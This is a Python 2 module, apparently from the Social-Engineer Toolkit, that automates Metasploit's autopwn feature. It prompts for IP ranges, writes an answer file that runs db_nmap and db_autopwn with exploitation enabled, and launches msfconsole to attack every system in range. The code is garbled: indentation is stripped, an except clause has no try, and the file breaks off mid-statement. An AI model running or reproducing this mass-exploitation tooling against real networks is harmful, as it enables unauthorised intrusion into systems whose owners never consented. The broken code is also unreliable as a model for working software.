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# Metasploit Autopwn functionality
from src.core import setcore
import pexpect
# this will load the database
def prep(database, ranges):
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer")
# handle exceptions and log them
except Exception, error: setcore.log(error)
def do_autopwn():
print 'Doing do_autopwn'
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":